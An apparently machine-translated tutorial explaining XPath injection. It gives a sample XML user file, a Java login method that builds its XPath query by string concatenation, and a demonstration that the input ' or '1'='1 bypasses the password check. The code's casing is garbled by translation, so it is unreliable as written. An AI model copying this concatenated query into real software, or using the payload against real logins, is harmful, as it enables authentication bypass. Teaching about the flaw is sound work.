The first thing to declare is that this article is purely an ignorant view of a little developer without foresight and knowledge, and is intended only for reference in Web system security.
1, some superfluous words
XPath injection and SQL injection, very similar in principle
But XPath injects objects primarily to XML, which is relatively more dangerous.
2. Save XML for user information
<?xml version= "1.0" encoding= "Utf-8"?><root><user><ID>1</ID><username>Admin</username><password>123</password></user><user><ID>5</ID><username>Ffm</username><password>1</password></user></root>
3. Matching statement of potential vulnerability
xpath.compile("//root/user[username/text()=‘" + username + "‘and password/text()=‘" + password + "‘]");
Similar to this assembled statement, there is a natural possibility of being attacked.
3, implementation of XPath injection Java login Verification source code
PackageCom.struts2;Importjavax.xml.parsers.*;Importjavax.xml.xpath.*;Importorg.w3c.dom.*;ImportCom.opensymphony.xwork2.ActionSupport;/** * A simple XPath authentication feature for illustrative situations only * * @author Fan Fangming */ Public class xpathloginaction extends actionsupport { PublicStringExecute()throwsException {return "Success"; } Public Boolean Getxpathinfo(string username, string password)throwsException {documentbuilderfactory domfactory = documentbuilderfactory.newinstance (); Domfactory.setnamespaceaware (true); Documentbuilder builder = Domfactory.newdocumentbuilder (); Xpathfactory factory = Xpathfactory.newinstance (); XPath XPath = Factory.newxpath (); Document doc = Builder.parse ("D:/ffm83/user.xml"); XPathExpression expr = Xpath.compile ("//root/user[username/text () = '"+ Username +"' and password/text () = '"+ Password +"']"); Object result = Expr.evaluate (doc, Xpathconstants.nodeset); NodeList nodes = (NodeList) result;if(Nodes.getlength () >=1) {System.out.println ("The landing was successful. ");return true; }Else{System.out.println ("User name or password error, Login failed." ");return false; } } Public Static void Main(string[] args)throwsException {Xpathloginaction XPath =NewXpathloginaction (); Xpath.getxpathinfo ("FFM","1"); }}
5. Operation condition
Xpath.getxpathinfo ("FFM", "1");
Landed successfully.
Xpath.getxpathinfo ("FFM", "2");
User name or password error, Login failed.
6. Simple Analog attack
In the Password field, enter: ' or ' 1 ' = ' 1
Xpath.getxpathinfo ("FFM", "' or ' 1 ' = ' 1");
After running discovery:
Landed successfully.
XPath injection has been successfully performed.
Watch your door-attack data store (4)-xpath injection attack